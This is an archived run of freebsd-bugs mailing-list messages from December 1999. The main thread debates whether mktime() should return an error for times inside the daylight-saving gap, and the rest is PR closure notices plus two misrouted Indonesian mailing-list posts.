gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA32227; Thu, 16 Dec 1999 12:30:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 12:30:07 -0800 (PST) Message-Id: <199912162030.MAA32227@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Poul-Henning Kamp Subject: Re: bin/15520: mktime() fails under certain conditions Reply-To: Poul-Henning Kamp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15520; it has been noted by GNATS. From: Poul-Henning Kamp To: Andre Albsmeier Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15520: mktime() fails under certain conditions Date: Thu, 16 Dec 1999 21:24:41 +0100 In message <199912162016.VAA97593@internal>, Andre Albsmeier writes: >mktime() fails if it is called with a time that is exactly >the moment when daylight saving time is starting. Well, at least for the "spring forward case" that time doesn't exist: 01:59:57 01:59:58 01:59:59 03:00:00 There is no 02:00:00 that night. If they test for that, they're crazy. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 12:40: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A7FC0156A6 for ; Thu, 16 Dec 1999 12:40:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA33173; Thu, 16 Dec 1999 12:40:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 12:40:05 -0800 (PST) Message-Id: <199912162040.MAA33173@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andre Albsmeier Subject: Re: bin/15520: mktime() fails under certain conditions Reply-To: Andre Albsmeier Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15520; it has been noted by GNATS. From: Andre Albsmeier To: Poul-Henning Kamp Cc: Andre Albsmeier , FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15520: mktime() fails under certain conditions Date: Thu, 16 Dec 1999 21:36:47 +0100 On Thu, 16-Dec-1999 at 21:24:41 +0100, Poul-Henning Kamp wrote: > In message <199912162016.VAA97593@internal>, Andre Albsmeier writes: > > >mktime() fails if it is called with a time that is exactly > >the moment when daylight saving time is starting. > > Well, at least for the "spring forward case" that time doesn't > exist: > > 01:59:57 > 01:59:58 > 01:59:59 > 03:00:00 > > There is no 02:00:00 that night. If they test for that, they're > crazy. Yes, the time does not exist. However, I only wonder it our behaviour of returning an error is correct in this case. I don't trust the GNU/Linux guys as much as I trust FreeBSD :-) but there might be a reason they are testing it. I was already asked in private email if the mktime() should succeed according to POSIX.1... Does somebody know anything about that? -Andre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 12:40:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E0DAF156F3 for ; Thu, 16 Dec 1999 12:40:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA33181; Thu, 16 Dec 1999 12:40:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 12:40:06 -0800 (PST) Message-Id: <199912162040.MAA33181@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Garrett Wollman Subject: bin/15520: mktime() fails under certain conditions Reply-To: Garrett Wollman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15520; it has been noted by GNATS. From: Garrett Wollman To: Andre Albsmeier Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: bin/15520: mktime() fails under certain conditions Date: Thu, 16 Dec 1999 15:39:19 -0500 (EST) < said: > mktime() fails if it is called with a time that is exactly > the moment when daylight saving time is starting. > The configure program of certain gnu software tests mktime() > for the failure described above. This fails on FreeBSD and > so configure assumes there is no working mktime available. ``certain gnu software'' is broken. Bring it up with the maintainers. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 13: 0:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E240314F0C for ; Thu, 16 Dec 1999 13:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA34729; Thu, 16 Dec 1999 13:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 13:00:02 -0800 (PST) Message-Id: <199912162100.NAA34729@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Poul-Henning Kamp Subject: Re: bin/15520: mktime() fails under certain conditions Reply-To: Poul-Henning Kamp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15520; it has been noted by GNATS. From: Poul-Henning Kamp To: Andre Albsmeier Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15520: mktime() fails under certain conditions Date: Thu, 16 Dec 1999 21:52:17 +0100 In message <19991216213647.A34480@internal>, Andre Albsmeier writes: >On Thu, 16-Dec-1999 at 21:24:41 +0100, Poul-Henning Kamp wrote: >> In message <199912162016.VAA97593@internal>, Andre Albsmeier writes: >> >> There is no 02:00:00 that night. If they test for that, they're >> crazy. > >Yes, the time does not exist. However, I only wonder it our >behaviour of returning an error is correct in this case. I don't >trust the GNU/Linux guys as much as I trust FreeBSD :-) but there >might be a reason they are testing it. > >I was already asked in private email if the mktime() should >succeed according to POSIX.1... Does somebody know anything >about that? Well, Hum. It seems to say that the fields are not constrained to their normal domains: The original values of the tm_wday and tm_yday components of the structure are ignored, and the original values of the other components are not restricted to the ranges described in the entry. It does not describe what should happen if I ask it to make a time out of 25:100:100, but I guess most of us can agree what it should do. The trouble with passing it 02:00:00 or for that matter 02:59:00 on the "spring forward" night, is that the time doesn't exist in the first place: Ie, does 02:10:00 represent 01:59:59 + 10:59 = 03:10:00 or 03:00:00 - 50:00 = 01:10:00 Since no sane argument either way really holds water, I think returning an error is correct. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 13:20: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 776311575B for ; Thu, 16 Dec 1999 13:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA36095; Thu, 16 Dec 1999 13:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id BF8C314F04; Thu, 16 Dec 1999 13:19:28 -0800 (PST) Message-Id: <19991216211928.BF8C314F04@hub.freebsd.org> Date: Thu, 16 Dec 1999 13:19:28 -0800 (PST) From: dhagan@cs.vt.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15521: anoncvs.freebsd.org doesn't work per http://www.freebsd.org/handbook/synching.html#ANONCVS Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15521 >Category: misc >Synopsis: anoncvs.freebsd.org doesn't work per http://www.freebsd.org/handbook/synching.html#ANONCVS >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 13:20:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Daniel Hagan >Release: 3.2-Stable >Organization: Virginia Tech Computer Science Dept. >Environment: FreeBSD raspberry.cslab.vt.edu 3.2-STABLE FreeBSD 3.2-STABLE #1: Sun Jun 6 14:09:22 EDT 1999 Concurrent Versions System (CVS) 1.10 `Halibut' (client/server) CVSROOT=anoncvs@anoncvs.freebsd.org:/cvs >Description: I am trying to checkout a copy of a program (df in particular) through anoncvs following Jordan's instructions in the URL above. However, I get the following error message: dhagan@raspberry:/tmp > cvs co df /ctm/FreeBSD/anoncvs/anoncvssh: No such file or directory cvs [checkout aborted]: end of file from server (consult above messages if any) It would appear (although I'm no expert) that anoncvs.freebsd.org is broken for some reason. >How-To-Repeat: Follow the steps given in http://www.freebsd.org/handbook/synching.html#ANONCVS should do it. >Fix: Reconfigure anoncvs.freebsd.org or rewrite the handbook article. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 13:20: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1F8EA1576C for ; Thu, 16 Dec 1999 13:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA36082; Thu, 16 Dec 1999 13:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 13:20:02 -0800 (PST) Message-Id: <199912162120.NAA36082@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andre Albsmeier Subject: Re: bin/15520: mktime() fails under certain conditions Reply-To: Andre Albsmeier Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15520; it has been noted by GNATS. From: Andre Albsmeier To: Poul-Henning Kamp Cc: Andre Albsmeier , FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15520: mktime() fails under certain conditions Date: Thu, 16 Dec 1999 22:14:11 +0100 On Thu, 16-Dec-1999 at 21:52:17 +0100, Poul-Henning Kamp wrote: > In message <19991216213647.A34480@internal>, Andre Albsmeier writes: > >On Thu, 16-Dec-1999 at 21:24:41 +0100, Poul-Henning Kamp wrote: > >> In message <199912162016.VAA97593@internal>, Andre Albsmeier writes: > >> > >> There is no 02:00:00 that night. If they test for that, they're > >> crazy. > > > >Yes, the time does not exist. However, I only wonder it our > >behaviour of returning an error is correct in this case. I don't > >trust the GNU/Linux guys as much as I trust FreeBSD :-) but there > >might be a reason they are testing it. > > > >I was already asked in private email if the mktime() should > >succeed according to POSIX.1... Does somebody know anything > >about that? > > Well, Hum. It seems to say that the fields are not constrained > to their normal domains: > > The original values of the tm_wday and tm_yday components > of the structure are ignored, and the original values of > the other components are not restricted to the ranges > described in the entry. > > It does not describe what should happen if I ask it to make a time > out of 25:100:100, but I guess most of us can agree what it should > do. > > The trouble with passing it 02:00:00 or for that matter 02:59:00 > on the "spring forward" night, is that the time doesn't exist in > the first place: Ie, does 02:10:00 represent > > 01:59:59 + 10:59 = 03:10:00 > or > 03:00:00 - 50:00 = 01:10:00 > > Since no sane argument either way really holds water, I think > returning an error is correct. I just tried to find out how HP-UX 10.20 and IRIX 5.3 interpret this; they both behave in the same way: When setting tm_hour to 2 (the illegal value) the result is 891766800. When using 1 for tm_hour we also get 891766800. When using 0 for tm_hour we get 891763200, this is -3600 from above. When using 3 for tm_hour the result is 891770400, this is +3600 compared to the first two. These two interpret the setting of tm_hour to 2 as 1. (That doesn't imply that I think this is correct). -Andre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 13:44:40 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 4A73814DFF for ; Thu, 16 Dec 1999 13:44:36 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id QAA40600; Thu, 16 Dec 1999 16:44:26 -0500 (EST) (envelope-from wollman) Date: Thu, 16 Dec 1999 16:44:26 -0500 (EST) From: Garrett Wollman Message-Id: <199912162144.QAA40600@khavrinen.lcs.mit.edu> To: Poul-Henning Kamp Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: bin/15520: mktime() fails under certain conditions In-Reply-To: <199912162100.NAA34729@freefall.freebsd.org> References: <199912162100.NAA34729@freefall.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > It does not describe what should happen if I ask it to make a time > out of 25:100:100, but I guess most of us can agree what it should > do. ANSI says that all fields are normalized. > Ie, does 02:10:00 represent > 01:59:59 + 10:59 = 03:10:00 > or > 03:00:00 - 50:00 = 01:10:00 Which is why tm_isdst needs to be set to indicate which one. When asked to ``figure it out'', mktime() correctly responds that it can't. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 13:53:59 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 718) id 11FC815014; Thu, 16 Dec 1999 13:53:49 -0800 (PST) To: gdc@xenetic.fi, jasone@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG From: jasone@FreeBSD.ORG Subject: Re: i386/7426 Message-Id: <19991216215349.11FC815014@hub.freebsd.org> Date: Thu, 16 Dec 1999 13:53:49 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Bugs in macro definitions of pthreads. State-Changed-From-To: suspended->closed State-Changed-By: jasone State-Changed-When: Wed Dec 15 23:54:25 PST 1999 State-Changed-Why: _POSIX_THREADS definition moved to unistd.h. _POSIX_THREAD_SAFE_FUNCTIONS undefined (breaks POSIX compliance in two ways, but we're already non-compliant). PTHREAD_MUTEX_INITIALIZER has apparently been added since this PR was filed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 13:56:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from awfulhak.org (dynamic-122.max4-du-ws.dialnetwork.pavilion.co.uk [212.74.9.250]) by hub.freebsd.org (Postfix) with ESMTP id 141FB15B52 for ; Thu, 16 Dec 1999 13:56:08 -0800 (PST) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by awfulhak.org (8.9.3/8.9.3) with ESMTP id VAA02633; Thu, 16 Dec 1999 21:52:05 GMT (envelope-from brian@lan.awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost.lan.Awfulhak.org [127.0.0.1]) by hak.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id VAA02879; Thu, 16 Dec 1999 21:53:59 GMT (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <199912162153.VAA02879@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.0 09/18/1999 To: Andre Albsmeier Cc: freebsd-bugs@FreeBSD.ORG, brian@hak.lan.Awfulhak.org Subject: Re: bin/15520: mktime() fails under certain conditions In-Reply-To: Message from Andre Albsmeier of "Thu, 16 Dec 1999 12:40:05 PST." <199912162040.MAA33173@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 16 Dec 1999 21:53:59 +0000 From: Brian Somers Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The following reply was made to PR bin/15520; it has been noted by GNATS. > > From: Andre Albsmeier > To: Poul-Henning Kamp > Cc: Andre Albsmeier , > FreeBSD-gnats-submit@FreeBSD.ORG > Subject: Re: bin/15520: mktime() fails under certain conditions > Date: Thu, 16 Dec 1999 21:36:47 +0100 > > On Thu, 16-Dec-1999 at 21:24:41 +0100, Poul-Henning Kamp wrote: > > In message <199912162016.VAA97593@internal>, Andre Albsmeier writes: > > > > >mktime() fails if it is called with a time that is exactly > > >the moment when daylight saving time is starting. > > > > Well, at least for the "spring forward case" that time doesn't > > exist: > > > > 01:59:57 > > 01:59:58 > > 01:59:59 > > 03:00:00 > > > > There is no 02:00:00 that night. If they test for that, they're > > crazy. > > Yes, the time does not exist. However, I only wonder it our > behaviour of returning an error is correct in this case. I don't > trust the GNU/Linux guys as much as I trust FreeBSD :-) but there > might be a reason they are testing it. > > I was already asked in private email if the mktime() should > succeed according to POSIX.1... Does somebody know anything > about that? I don't, but I've got a few PRs that I'd like to close WRT date -v skipping over such times... so I'd be interested in any definitive answers that anyone can come up with. > -Andre -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 14:36:55 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 718) id 5390B14A10; Thu, 16 Dec 1999 14:36:54 -0800 (PST) To: kobayasi@north.ad.jp, jasone@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG From: jasone@FreeBSD.ORG Subject: Re: bin/8281 Message-Id: <19991216223654.5390B14A10@hub.freebsd.org> Date: Thu, 16 Dec 1999 14:36:54 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: writev() in libc_r causes loop State-Changed-From-To: open->closed State-Changed-By: jasone State-Changed-When: Thu Dec 16 14:35:53 PST 1999 State-Changed-Why: The provided fix was applied (with minor modifications). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 14:41:18 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 718) id 35E811510B; Thu, 16 Dec 1999 14:41:17 -0800 (PST) To: dbeck@freesoft.hu, jasone@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG From: jasone@FreeBSD.ORG Subject: Re: kern/8729 Message-Id: <19991216224117.35E811510B@hub.freebsd.org> Date: Thu, 16 Dec 1999 14:41:17 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: SYSV Semaphore blocks all threads State-Changed-From-To: open->closed State-Changed-By: jasone State-Changed-When: Thu Dec 16 14:40:10 PST 1999 State-Changed-Why: This PR reports the same problem as bin/8281. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 14:53: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 718) id 67D6714DFB; Thu, 16 Dec 1999 14:53:02 -0800 (PST) To: dick@tar.com, jasone@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG From: jasone@FreeBSD.ORG Subject: Re: misc/9778 Message-Id: <19991216225302.67D6714DFB@hub.freebsd.org> Date: Thu, 16 Dec 1999 14:53:02 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Need to handle conflicting pthread.h and semaphore.h State-Changed-From-To: open->closed State-Changed-By: jasone State-Changed-When: Thu Dec 16 14:52:17 PST 1999 State-Changed-Why: Closed due to obsoletion, as per the originator's suggestion. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 19:16:23 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mx2.itb.ac.id (mx2.itb.ac.id [202.249.47.37]) by hub.freebsd.org (Postfix) with SMTP id 637891522D for ; Thu, 16 Dec 1999 19:16:15 -0800 (PST) (envelope-from ceritadewi-return-138-caca151=cyberlib.itb.ac.id@returns.egroups.com) Received: (qmail 17246 invoked by uid 1003); 17 Dec 1999 03:15:33 -0000 Received: from unknown (HELO cyberlib.itb.ac.id) (167.205.20.28) by mx2.itb.ac.id with SMTP; 17 Dec 1999 03:15:33 -0000 Received: (qmail 1683 invoked by uid 1199); 17 Dec 1999 03:16:26 -0000 Delivered-To: janna151@cyberlib.itb.ac.id Received: (qmail 1653 invoked by uid 1593); 17 Dec 1999 03:16:25 -0000 Delivered-To: caca151@cyberlib.itb.ac.id Received: (qmail 15832 invoked from network); 13 Dec 1999 21:49:57 -0000 Received: from unknown (HELO xcj.egroups.com) (207.138.41.175) by cyberlib.itb.ac.id with SMTP; 13 Dec 1999 21:49:57 -0000 X-eGroups-Return: ceritadewi-return-138-caca151=cyberlib.itb.ac.id@returns.egroups.com Received: from [10.1.2.41] by cj.egroups.com with NNFMP; 13 Dec 1999 21:43:58 -0000 Received: (listserv 1.291); by a1; 13 Dec 1999 21:43:54 -0000 X-Duplicate: Duplicate(5)--1942101419 Delivered-To: listsaver-egroups-ceritadewi@egroups.com Received: (qmail 959 invoked from network); 13 Dec 1999 04:03:47 -0000 Received: from nytoday.whowhere.com (HELO mc-qout2.whowhere.com) (209.1.236.38) by qh.egroups.com with SMTP; 13 Dec 1999 04:03:47 -0000 Received: from Unknown/Local ([?.?.?.?]) by shared1-mail.whowhere.com; Sun Dec 12 18:16:40 1999 To: ceritadewi@egroups.com Date: Mon, 13 Dec 1999 09:16:40 +0700 From: "Arman Arman Armanto" Message-ID: Cc: citradewi@egroups.com, humordewi@egroups.com, bisnisdewi@egroups.com, dewadewi@egroups.com X-Sent-Mail: off X-Mailer: MailCity Service X-Sender-Ip: 203.130.244.47 Organization: N2Mail (http://www.n2mail.com:80) Content-Language: en Mailing-List: contact ceritadewi-owner@egroups.com X-Mailing-List: ceritadewi@egroups.com List-Help: , List-Unsubscribe: List-Archive: X-eGroups-Approved-By: webmaster@dewadewi.net via webctrl Reply-To: ceritadewi@egroups.com Subject: [CeritaDewi] penelitian MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kepada para anggota mailing list dewadewi yth, Perkenalkan nama saya Armanto, saya adalah mahasiswa Fakultas Psikologi UGM. Dalam rangka skripsi saya, maka saya melakukan penelitian tentang internet. Melalui e-mail ini saya memohon kesediaan para anggota mailing list dewadewi untuk mengisikan angket penelitian saya pada alamat : http://riset.tripod.com/cgi-bin/index.html Besar harapan saya, anggota mailing list dewadewi berkenan mengisikan angket penelitian ini. Hormat saya, Armanto N.D. Fakultas Psikologi UGM What are you N2? Choose from 150 free e-mail addresses. http://www.n2mail.com ------------------------------------------------------------------------ =============================================================== subscribe : kirim email ke ceritaDewi-subscribe@egroups.com unsubscribe : kirim email ke ceritaDewi-unsubscribe@egroups.com kirim cerita : kirim email ke ceritaDewi@hotmail.com --------- bangga menjadi bagian dari www.DewaDewi.com --------- ------------------------------------------------------------------------ A Proud Member of the One & Only Associate Network http://clickhere.egroups.com/click/1709 eGroups.com Home: http://www.egroups.com/group/ceritadewi/ http://www.egroups.com - Simplifying group communications To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 19:17:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mx2.itb.ac.id (mx2.itb.ac.id [202.249.47.37]) by hub.freebsd.org (Postfix) with SMTP id 2116215216 for ; Thu, 16 Dec 1999 19:17:02 -0800 (PST) (envelope-from ceritadewi-return-139-caca151=cyberlib.itb.ac.id@returns.egroups.com) Received: (qmail 17574 invoked by uid 1003); 17 Dec 1999 03:16:21 -0000 Received: from unknown (HELO cyberlib.itb.ac.id) (167.205.20.28) by mx2.itb.ac.id with SMTP; 17 Dec 1999 03:16:21 -0000 Received: (qmail 2122 invoked by uid 1199); 17 Dec 1999 03:17:14 -0000 Delivered-To: janna151@cyberlib.itb.ac.id Received: (qmail 2115 invoked by uid 1593); 17 Dec 1999 03:17:13 -0000 Delivered-To: caca151@cyberlib.itb.ac.id Received: (qmail 16013 invoked from network); 13 Dec 1999 21:50:44 -0000 Received: from unknown (HELO xcj.egroups.com) (207.138.41.175) by cyberlib.itb.ac.id with SMTP; 13 Dec 1999 21:50:44 -0000 X-eGroups-Return: ceritadewi-return-139-caca151=cyberlib.itb.ac.id@returns.egroups.com Received: from [10.1.2.41] by cj.egroups.com with NNFMP; 13 Dec 1999 21:44:05 -0000 Received: (listserv 1.291); by a1; 13 Dec 1999 21:44:03 -0000 Delivered-To: listsaver-egroups-ceritaDewi@eGroups.com Received: (qmail 2084 invoked from network); 13 Dec 1999 17:15:38 -0000 Received: from mail4.burlee.com (199.93.70.16) by qg.egroups.com with SMTP; 13 Dec 1999 17:15:38 -0000 Received: from www4 [199.93.70.22] by mail4.burlee.com (SMTPD32-5.05) id A67F366F0394; Mon, 13 Dec 1999 12:01:51 -0500 From: DewaDewi To: DewaDewi Group Date: Mon, 13 Dec 1999 17:24:25 "GMT" X-MSMail-Priority: Normal X-mailer: AspMail 3.03 (SMTPBD347A) Message-Id: <199912131201890.SM00183@www4> Mailing-List: contact ceritadewi-owner@egroups.com X-Mailing-List: ceritadewi@egroups.com List-Help: , List-Unsubscribe: List-Archive: X-eGroups-Approved-By: webmaster@dewadewi.net via webctrl Reply-To: ceritadewi@egroups.com Subject: [CeritaDewi] PEMILIHAN MEMBER TERBAIK DEWADEWI[2] MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ceritaDewi@eGroups.com ================================================================= PEMILIHAN MEMBER TERBAIK DEWADEWI ================================================================= Menyambut satu juta pengunjung, DewaDewi, bekerja sama dengan penerbit komik politik Megawati, menyelenggarakan Lomba Pemilihan Anggota Mailing List Terbaik. Keterangan lomba : 1. Anda yang terdaftar sebagai member mailinglist, otomatis termasuk dalam peserta lomba ini. 2. Pemilihan member ini meliputi kriteria: - keaktifan mengirimkan materi ke mailing list - penggunaan netiket dalam pengiriman email - kualitas materi yang dikirimkan - saran-saran yang pernah dikirimkan ke DewaDewi 3. Dari semua peserta, akan dipilih 10 orang untuk masuk ke babak final. Kesepuluh humor ini akan dipoll di web, sehingga pengunjunglah yang akan menentukan 5 pemenangnya. 4. 5 Pemenang akan mendapatkan hadiah masing-masing 1 buah komik Politik Megawati. 5. Sementara pengiriman hadiah hanya untuk seluruh wilayah Indonesia. 6. Identitas yang digunakan sebagai pengenal adalah alamat email. Setelah ditetapkan pemenangnya, kami akan menguhubungi Anda melalui alamat email yang Anda gunakan. Alamat email tidak dapat diganti/dialihkan dengan alasan apapun. 7. Pemenang akan diumumkan melalui mailinglist DewaDewi Group. 8. Jika terdapat suatu hal yang di luar kemampuan kami, gangguan teknis, dan lain-lain masalah, DewaDewi merupakan satu-satunya pihak yang berhak mengambil keputusan, dan semua pihak yang terlibat (sponsor, peserta, juri) dianggap menyetujui atau akan menyetujui keputusan yang diambil. Lancaster, Pennsylvania, USA, 7 Desember 1999, DewaDewi(dot)com ------------------------------------------------------------------------ You received this email because you are a member of ceritaDewi@eGroups.com mailing list. ------------------------------------------------------------------------ =============================================================== subscribe : kirim email ke ceritaDewi-subscribe@egroups.com unsubscribe : kirim email ke ceritaDewi-unsubscribe@egroups.com kirim cerita : kirim email ke ceritaDewi@hotmail.com --------- bangga menjadi bagian dari www.DewaDewi.com --------- ------------------------------------------------------------------------ A Proud Member of the One & Only Associate Network http://clickhere.egroups.com/click/1709 eGroups.com home: http://www.egroups.com/group/ceritadewi http://www.egroups.com - Simplifying group communications To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 16 19:50: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 90EF3150CF for ; Thu, 16 Dec 1999 19:50:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA83739; Thu, 16 Dec 1999 19:50:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 19:50:05 -0800 (PST) Message-Id: <199912170350.TAA83739@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: abc@firehouse.net Subject: Re: 